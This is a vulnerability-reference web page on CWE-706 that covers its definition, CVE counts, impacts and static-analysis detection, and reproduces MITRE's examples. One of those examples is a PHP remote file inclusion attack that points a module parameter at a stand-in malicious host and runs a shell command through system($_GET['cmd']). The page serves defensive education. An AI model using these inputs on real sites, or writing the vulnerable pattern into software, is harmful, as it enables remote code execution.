Log in
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Last updated
CWE-706 (Use of Incorrectly-Resolved Name or Reference) is a class-level software weakness catalogued by MITRE in the Common Weakness Enumeration (CWE). It describes a recurring type of mistake that can lead to exploitable security vulnerabilities.
50 recorded CVEs are caused by CWE-706 (Use of Incorrectly-Resolved Name or Reference), including 2 in CISA's KEV (Known Exploited Vulnerabilities) catalog. KEVs are shown first. 16 new CWE-706 CVEs have been recorded so far in 2026 (6 in 2025).
Showing 12 of 50 recorded CWE-706 CVEs. Track new ones as they are published and get AI-written analysis and fixes.
Monitor CWE-706 vulnerabilitiesWhat can happen when CWE-706 is exploited.
Read Application Data, Modify Application Data
Affects: Confidentiality, Integrity
Typically introduced during these phases of the software lifecycle.
Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)
Illustrative examples from MITRE showing how the weakness appears in code.
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
Vulnerable example
$dir = $_GET['module_name'];Attack input
victim.php?module_name=http://malicious.example.comVulnerable example
system($_GET['cmd']);Attack input
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-lAttack input
/bin/ls -lThis script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user.
Vulnerable example
import osSafe example
import osCAPEC attack patterns that exploit this weakness.
Common questions about CWE-706.
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
50 recorded CVEs are attributed to CWE-706, including CVE-2021-40539, CVE-2020-15505, CVE-2024-35198. 2 are listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
Automated Static Analysis: Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)
Exploiting CWE-706 can lead to: Read Application Data, Modify Application Data.
Yes. 2 CWE-706 vulnerabilities are in CISA's KEV catalog of actively exploited flaws, out of 50 recorded CVEs.
Weakness data is sourced from the MITRE CWE catalog (v4.20). CVE associations are aggregated and kept current by RadicalNotion.AI.
Get alerted the moment a new CWE-706 vulnerability affects your stack, with AI-written analysis, severity context, and remediation guidance.